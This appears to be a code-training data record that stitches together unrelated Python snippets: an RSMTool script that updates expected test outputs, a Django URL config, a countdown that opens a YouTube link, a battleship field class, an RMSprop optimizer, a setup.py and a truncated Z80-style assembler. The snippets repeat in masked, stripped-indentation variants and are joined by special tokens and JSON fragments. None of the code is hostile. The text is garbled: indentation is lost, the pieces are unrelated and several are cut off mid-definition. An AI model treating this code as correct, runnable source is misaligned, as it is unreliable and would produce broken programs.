'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main():
parser = argparse.ArgumentParser(prog='update_test_files.py')
parser.add_argument('--tests', dest='tests_dir', required=True, help=
'The path to the existing RSMTool tests directory')
parser.add_argument('--outputs', dest='outputs_dir', required=True,
help=
'The path to the directory containing the updated test outputs (usually `test_outputs`)'
)
args = parser.parse_args()
run_test_suite = input('Have you already run the whole test suite? (y/n): '
)
if run_test_suite == 'n':
print(
'Please run the whole test suite using `nose2 -s tests` before running this script.'
)
sys.exit(0)
elif run_test_suite != 'y':
print('Invalid answer. Exiting.')
sys.exit(1)
else:
print()
suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(
'tests').glob('test_experiment_*.py')]
updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.
tests_dir, updated_outputs_directory=args.outputs_dir)
updater.run()
updater.print_report()
if __name__ == '__main__':
main()
<|reserved_special_token_1|>
#!/usr/bin/env python
"""
Update the expected test outputs and inputs for rsmsummarize and rsmcompare tests.
This script assumes that you have already run `nose2 -s tests` and ran the entire
test suite. By doing so, the output has been generated under the given outputs
directory. And that is what will be used to generate the new expected output
under `tests/data/experiments`.
#############################################################################################
# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #
#############################################################################################
The script works as follows. For each experiment test:
- The script locates the output under the updated outputs directory.
- New and changed files in this directory are copied over to the expected test
output location.
- Old files in the expected test output are deleted.
- Files that are already in the expected test output and have not changed are
left alone.
- Directories that are missing or empty under the updated test outputs are shown.
- For rsmsummarize and rsmcompare tests, the same logic is also applied to input
data. It is assumed that the input experiments are copies of the experiments
from existing tests.
Note: If running this script results in changes to the inputs for rsmcompare
or rsmsummarize tests, you will need to first re-run the tests for those two
tools and then, potentially, run this script again to update their test outputs.
See `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_
for a further explanation of this process.
The script prints a log detailing the changes made for each experiment test.
:author: Nitin Madnani
:author: Anastassia Loukina
:author: Jeremy Biggs
:organization: ETS
"""
import argparse
import re
import sys
from pathlib import Path
from rsmtool.test_utils import FileUpdater
def main(): # noqa: D103
# set up an argument parser
parser = argparse.ArgumentParser(prog="update_test_files.py")
parser.add_argument(
"--tests",
dest="tests_dir",
required=True,
help="The path to the existing RSMTool tests directory",
)
parser.add_argument(
"--outputs",
dest="outputs_dir",
required=True,
help="The path to the directory containing the updated test "
"outputs (usually `test_outputs`)",
)
# parse given command line arguments
args = parser.parse_args()
# print out a reminder that the user should have run the test suite
run_test_suite = input("Have you already run the whole test suite? (y/n): ")
if run_test_suite == "n":
print("Please run the whole test suite using `nose2 -s tests` before running this script.")
sys.exit(0)
elif run_test_suite != "y":
print("Invalid answer. Exiting.")
sys.exit(1)
else:
print()
# iterate over the given tests directory and find all files named
# `test_experiment_*.py` and get their suffixes for use with the
# FileUpdater object.
suffixes = [
re.sub(r"test_experiment_", "", p.stem) for p in Path("tests").glob("test_experiment_*.py")
]
# instantiate a FileUpdater object
updater = FileUpdater(
test_suffixes=suffixes,
tests_directory=args.tests_dir,
updated_outputs_directory=args.outputs_dir,
)
# run the file updates
updater.run()
# now print the report from the updated object
updater.print_report()
if __name__ == "__main__":
main()
|
flexible
|
{
"blob_id": "7e20c61fa30ea93e69a2479e70449638eb52b7bb",
"index": 2964,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-4": "<mask token>\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main():\n parser = argparse.ArgumentParser(prog='update_test_files.py')\n parser.add_argument('--tests', dest='tests_dir', required=True, help=\n 'The path to the existing RSMTool tests directory')\n parser.add_argument('--outputs', dest='outputs_dir', required=True,\n help=\n 'The path to the directory containing the updated test outputs (usually `test_outputs`)'\n )\n args = parser.parse_args()\n run_test_suite = input('Have you already run the whole test suite? (y/n): '\n )\n if run_test_suite == 'n':\n print(\n 'Please run the whole test suite using `nose2 -s tests` before running this script.'\n )\n sys.exit(0)\n elif run_test_suite != 'y':\n print('Invalid answer. Exiting.')\n sys.exit(1)\n else:\n print()\n suffixes = [re.sub('test_experiment_', '', p.stem) for p in Path(\n 'tests').glob('test_experiment_*.py')]\n updater = FileUpdater(test_suffixes=suffixes, tests_directory=args.\n tests_dir, updated_outputs_directory=args.outputs_dir)\n updater.run()\n updater.print_report()\n\n\nif __name__ == '__main__':\n main()\n",
"step-5": "#!/usr/bin/env python\n\"\"\"\nUpdate the expected test outputs and inputs for rsmsummarize and rsmcompare tests.\n\nThis script assumes that you have already run `nose2 -s tests` and ran the entire\ntest suite. By doing so, the output has been generated under the given outputs\ndirectory. And that is what will be used to generate the new expected output\nunder `tests/data/experiments`.\n\n#############################################################################################\n# IMPORTANT: DO NOT RUN THIS SCRIPT BEFORE RUNNING THE TEST SUITE OR IT WILL BE DISASTROUS. #\n#############################################################################################\n\nThe script works as follows. For each experiment test:\n- The script locates the output under the updated outputs directory.\n- New and changed files in this directory are copied over to the expected test\n output location.\n- Old files in the expected test output are deleted.\n- Files that are already in the expected test output and have not changed are\n left alone.\n- Directories that are missing or empty under the updated test outputs are shown.\n- For rsmsummarize and rsmcompare tests, the same logic is also applied to input\n data. It is assumed that the input experiments are copies of the experiments\n from existing tests.\n\nNote: If running this script results in changes to the inputs for rsmcompare\nor rsmsummarize tests, you will need to first re-run the tests for those two\ntools and then, potentially, run this script again to update their test outputs.\n\nSee `documentation <https://rsmtool.readthedocs.io/en/main/contributing.html#writing-new-functional-tests>`_\nfor a further explanation of this process.\n\nThe script prints a log detailing the changes made for each experiment test.\n\n:author: Nitin Madnani\n:author: Anastassia Loukina\n:author: Jeremy Biggs\n\n:organization: ETS\n\"\"\"\n\nimport argparse\nimport re\nimport sys\nfrom pathlib import Path\n\nfrom rsmtool.test_utils import FileUpdater\n\n\ndef main(): # noqa: D103\n # set up an argument parser\n parser = argparse.ArgumentParser(prog=\"update_test_files.py\")\n parser.add_argument(\n \"--tests\",\n dest=\"tests_dir\",\n required=True,\n help=\"The path to the existing RSMTool tests directory\",\n )\n parser.add_argument(\n \"--outputs\",\n dest=\"outputs_dir\",\n required=True,\n help=\"The path to the directory containing the updated test \"\n \"outputs (usually `test_outputs`)\",\n )\n\n # parse given command line arguments\n args = parser.parse_args()\n\n # print out a reminder that the user should have run the test suite\n run_test_suite = input(\"Have you already run the whole test suite? (y/n): \")\n if run_test_suite == \"n\":\n print(\"Please run the whole test suite using `nose2 -s tests` before running this script.\")\n sys.exit(0)\n elif run_test_suite != \"y\":\n print(\"Invalid answer. Exiting.\")\n sys.exit(1)\n else:\n print()\n\n # iterate over the given tests directory and find all files named\n # `test_experiment_*.py` and get their suffixes for use with the\n # FileUpdater object.\n suffixes = [\n re.sub(r\"test_experiment_\", \"\", p.stem) for p in Path(\"tests\").glob(\"test_experiment_*.py\")\n ]\n\n # instantiate a FileUpdater object\n updater = FileUpdater(\n test_suffixes=suffixes,\n tests_directory=args.tests_dir,\n updated_outputs_directory=args.outputs_dir,\n )\n\n # run the file updates\n updater.run()\n\n # now print the report from the updated object\n updater.print_report()\n\n\nif __name__ == \"__main__\":\n main()\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
from django.urls import path, re_path
from app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView
app_name = "directory"
urlpatterns = [
re_path(r"^directory/uploader/?$", UploaderAPIView.as_view(), name="teacher_uploader"),
re_path(r"^directory/teachers/?$", TeacherListAPIView.as_view(), name="teacher_list"),
path("directory/teachers/<int:pk>/", TeacherDetailAPIView.as_view(), name="teacher_detail"),
]
|
normal
|
{
"blob_id": "666e839b4d66dc4eede4e7325bfd4f4b801fd47d",
"index": 5330,
"step-1": "<mask token>\n",
"step-2": "<mask token>\napp_name = 'directory'\nurlpatterns = [re_path('^directory/uploader/?$', UploaderAPIView.as_view(),\n name='teacher_uploader'), re_path('^directory/teachers/?$',\n TeacherListAPIView.as_view(), name='teacher_list'), path(\n 'directory/teachers/<int:pk>/', TeacherDetailAPIView.as_view(), name=\n 'teacher_detail')]\n",
"step-3": "from django.urls import path, re_path\nfrom app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView\napp_name = 'directory'\nurlpatterns = [re_path('^directory/uploader/?$', UploaderAPIView.as_view(),\n name='teacher_uploader'), re_path('^directory/teachers/?$',\n TeacherListAPIView.as_view(), name='teacher_list'), path(\n 'directory/teachers/<int:pk>/', TeacherDetailAPIView.as_view(), name=\n 'teacher_detail')]\n",
"step-4": "from django.urls import path, re_path\n\nfrom app.views import UploaderAPIView, TeacherListAPIView, TeacherDetailAPIView\n\napp_name = \"directory\"\nurlpatterns = [\n re_path(r\"^directory/uploader/?$\", UploaderAPIView.as_view(), name=\"teacher_uploader\"),\n re_path(r\"^directory/teachers/?$\", TeacherListAPIView.as_view(), name=\"teacher_list\"),\n path(\"directory/teachers/<int:pk>/\", TeacherDetailAPIView.as_view(), name=\"teacher_detail\"),\n]\n",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
x = 10
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
import webbrowser
import time
x = 10
while x > 0:
print(x), time.sleep(1)
x = x - 1
while x == 0:
print('MEOW')
webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')
<|reserved_special_token_1|>
import webbrowser
import time
x=10
while x > 0:
print (x), time.sleep(1)
x=x-1
while x==0:
print ("MEOW")
webbrowser.open("https://www.youtube.com/watch?v=IuysY1BekOE")
|
flexible
|
{
"blob_id": "4d31357936ce53b2be5f9a952b99df58baffe7ea",
"index": 4937,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-3": "<mask token>\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-4": "import webbrowser\nimport time\nx = 10\nwhile x > 0:\n print(x), time.sleep(1)\n x = x - 1\nwhile x == 0:\n print('MEOW')\n webbrowser.open('https://www.youtube.com/watch?v=IuysY1BekOE')\n",
"step-5": "import webbrowser\nimport time\nx=10\nwhile x > 0:\n print (x), time.sleep(1)\n x=x-1\nwhile x==0:\n print (\"MEOW\")\n webbrowser.open(\"https://www.youtube.com/watch?v=IuysY1BekOE\")\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
class FieldDesigner:
"""
Designs a field for BattleShips, accepts field height and width
"""
def __init__(
self,
):
self.field = []
def design_field(
self,
height,
width,
):
self.field = [[
'~' for __
in range(height)]
for __ in range(width)
]
return self.field
def __str__(
self,
):
return '\n'.join(map(str, self.field))
|
normal
|
{
"blob_id": "c812419e7e024b0bb1207832b2b4a726ef61b272",
"index": 9137,
"step-1": "class FieldDesigner:\n <mask token>\n <mask token>\n <mask token>\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-2": "class FieldDesigner:\n <mask token>\n\n def __init__(self):\n self.field = []\n <mask token>\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-3": "class FieldDesigner:\n <mask token>\n\n def __init__(self):\n self.field = []\n\n def design_field(self, height, width):\n self.field = [['~' for __ in range(height)] for __ in range(width)]\n return self.field\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-4": "class FieldDesigner:\n \"\"\"\n Designs a field for BattleShips, accepts field height and width\n \"\"\"\n\n def __init__(self):\n self.field = []\n\n def design_field(self, height, width):\n self.field = [['~' for __ in range(height)] for __ in range(width)]\n return self.field\n\n def __str__(self):\n return '\\n'.join(map(str, self.field))\n",
"step-5": "class FieldDesigner:\n \"\"\"\n Designs a field for BattleShips, accepts field height and width\n \"\"\"\n def __init__(\n self,\n ):\n self.field = []\n\n def design_field(\n self,\n height,\n width,\n ):\n\n self.field = [[\n '~' for __\n in range(height)]\n for __ in range(width)\n ]\n\n return self.field\n\n def __str__(\n self,\n ):\n return '\\n'.join(map(str, self.field))",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
import numpy as np
from nn.feedforward_nn import Feed_Forward
class RMSprop(object):
def __init__(self,n_in,n_hid,n_out,regularization_coe):
self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)
def set_param(self,param):
if 'learning_rate' in param.keys():
self.learning_rate = param['learning_rate']
else:
self.learning_rate = 0.01
if 'n_iter' in param.keys():
self.n_iter = param['n_iter']
else:
self.n_iter = int(1000)
if 'rho' in param.keys():
self.rho = param['rho']
else:
self.rho = 0.9
if 'epsilon' in param.keys():
self.epsilon = param['epsilon']
else:
self.epsilon = 1e-8
def set_train_data(self,x:np.array,t:np.array):
self.nn.xlist = x
self.nn.tlist = t
def update(self,w,**kwargs):
self.set_param(kwargs)
rho = self.rho
epsilon = self.epsilon
lr = self.learning_rate
v = 0
for t in range(1,self.n_iter):
[gradE,E] = self.nn.gradE(w)
g = gradE
v = rho * v + (1 - rho) * g * g
eta = lr / (epsilon + np.sqrt(v))
w -= eta * g
return(w)
|
normal
|
{
"blob_id": "f971302f39149bcdcbe4237cc71219572db600d4",
"index": 8720,
"step-1": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n <mask token>\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-3": "<mask token>\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-4": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\n\n\nclass RMSprop(object):\n\n def __init__(self, n_in, n_hid, n_out, regularization_coe):\n self.nn = Feed_Forward(n_in, n_hid, n_out, regularization_coe)\n\n def set_param(self, param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-08\n\n def set_train_data(self, x: np.array, t: np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self, w, **kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1, self.n_iter):\n [gradE, E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return w\n",
"step-5": "import numpy as np\nfrom nn.feedforward_nn import Feed_Forward\nclass RMSprop(object):\n\n def __init__(self,n_in,n_hid,n_out,regularization_coe):\n self.nn = Feed_Forward(n_in,n_hid,n_out,regularization_coe)\n\n\n def set_param(self,param):\n if 'learning_rate' in param.keys():\n self.learning_rate = param['learning_rate']\n else:\n self.learning_rate = 0.01\n\n if 'n_iter' in param.keys():\n self.n_iter = param['n_iter']\n else:\n self.n_iter = int(1000)\n\n if 'rho' in param.keys():\n self.rho = param['rho']\n else:\n self.rho = 0.9\n\n if 'epsilon' in param.keys():\n self.epsilon = param['epsilon']\n else:\n self.epsilon = 1e-8\n\n def set_train_data(self,x:np.array,t:np.array):\n self.nn.xlist = x\n self.nn.tlist = t\n\n def update(self,w,**kwargs):\n self.set_param(kwargs)\n rho = self.rho\n epsilon = self.epsilon\n lr = self.learning_rate\n v = 0\n for t in range(1,self.n_iter):\n [gradE,E] = self.nn.gradE(w)\n g = gradE\n v = rho * v + (1 - rho) * g * g\n eta = lr / (epsilon + np.sqrt(v))\n w -= eta * g\n return(w)\n",
"step-ids": [
2,
4,
5,
6,
7
]
}
|
[
2,
4,
5,
6,
7
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
try:
from setuptools import setup, find_packages
except ImportError:
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(name='pip-utils', version='0.0.1', url=
'https://github.com/mattpaletta/pip-utils', packages=find_packages(),
include_package_data=True, install_requires=['threadlru',
'beautifulsoup4'], setup_requires=[], author='Matthew Paletta',
author_email='[email protected]', description=
'Programatic Utils for pip management', license='BSD', dependency_links
=[
'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'
])
<|reserved_special_token_1|>
try:
from setuptools import setup, find_packages
except ImportError:
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages
setup(
name = "pip-utils",
version = "0.0.1",
url = 'https://github.com/mattpaletta/pip-utils',
packages = find_packages(),
include_package_data = True,
install_requires = ["threadlru", "beautifulsoup4"],
setup_requires = [],
author = "Matthew Paletta",
author_email = "[email protected]",
description = "Programatic Utils for pip management",
license = "BSD",
dependency_links=[
'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'
],
)
|
flexible
|
{
"blob_id": "5fe81a6143642d671686c6623a9ecc93e04a82bf",
"index": 5711,
"step-1": "<mask token>\n",
"step-2": "try:\n from setuptools import setup, find_packages\nexcept ImportError:\n import ez_setup\n ez_setup.use_setuptools()\n from setuptools import setup, find_packages\nsetup(name='pip-utils', version='0.0.1', url=\n 'https://github.com/mattpaletta/pip-utils', packages=find_packages(),\n include_package_data=True, install_requires=['threadlru',\n 'beautifulsoup4'], setup_requires=[], author='Matthew Paletta',\n author_email='[email protected]', description=\n 'Programatic Utils for pip management', license='BSD', dependency_links\n =[\n 'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'\n ])\n",
"step-3": "try:\n from setuptools import setup, find_packages\nexcept ImportError:\n import ez_setup\n\n ez_setup.use_setuptools()\n from setuptools import setup, find_packages\n\nsetup(\n name = \"pip-utils\",\n version = \"0.0.1\",\n url = 'https://github.com/mattpaletta/pip-utils',\n packages = find_packages(),\n include_package_data = True,\n install_requires = [\"threadlru\", \"beautifulsoup4\"],\n setup_requires = [],\n author = \"Matthew Paletta\",\n author_email = \"[email protected]\",\n description = \"Programatic Utils for pip management\",\n license = \"BSD\",\n dependency_links=[\n 'git+git://github.com/mattpaletta/pynotstdlib.git@master#egg=pynotstdlib-0'\n ],\n)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
self.x = self.TS[operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
<|reserved_special_token_0|>
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
self.x = self.TS[operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
if label[0] in mne.v_ops or label[0] in mne.map_mnem:
print('Error etiqueta invalida')
self.TS[label[0].strip()] = self.cl
del label[0]
self.instruction = label[0]
def get_operands(self):
line = self.instruction.split()
self.operands = [operand for operand in line]
self.instruction = self.operands[0]
del self.operands[0]
self.num_ope = len(self.operands)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class Ensambler(object):
def __init__(self, fileName):
self.fileName = fileName
self.fileLines = []
self.cl = 0
self.size = 0
self.code = ''
self.instruction = ''
self.num_ope = 0
self.operands = []
self.TS = {}
self.CO = []
self.x = 0
def leerArchivo(self):
file = open(self.fileName, 'r')
for line in file:
line = line.replace('\n', '')
line = line.replace('\t', '')
self.fileLines.append(line)
file.close()
def first_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.num_ope == 1:
if self.instruction in mne.v_jump:
if self.instruction == 'JP':
self.x = self.TS[operands[0]]
print('l')
print(self.x)
if self.operands[0] in mne.v_jump:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.operands[0][1:-1].isnumeric():
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
if self.instruction in mne.v_jump:
self.operands[0] = 'nn'
self.instruction = (self.instruction + ' ' + self.
operands[0])
code, size = mne.map_mnem.get(self.instruction, 'Error'
)('0000')
self.cl += size
else:
print(self.instruction)
print(self.CO)
print(self.cl)
print(self.TS)
def Second_pass(self):
for line in self.fileLines:
self.clean_line(line)
self.get_label()
self.get_operands()
if self.instruction in mne.v_jump:
if len(self.operands) == 2:
aux = self.operands[1]
else:
aux = self.operands[0]
if aux in self.TS.keys():
self.x = self.TS[aux]
self.instruction = self.instruction + ' ' + 'nn'
code, size = mne.map_mnem.get(self.instruction, 'Error')(
str(self.x))
self.CO.append(code)
else:
print('Error')
else:
if self.num_ope == 2:
self.instruction = self.instruction + ' ' + self.operands[0
] + ',' + self.operands[1]
if self.num_ope == 1:
self.instruction = self.instruction + ' ' + self.operands[0
]
code, size = mne.map_mnem.get(self.instruction, 'Error')()
self.CO.append(code)
print(self.CO)
def clean_line(self, line):
line = line.split(';')
self.instruction = line[0].upper().replace(',', '')
def get_label(self):
label = self.instruction.split(':')
if len(label) > 1:
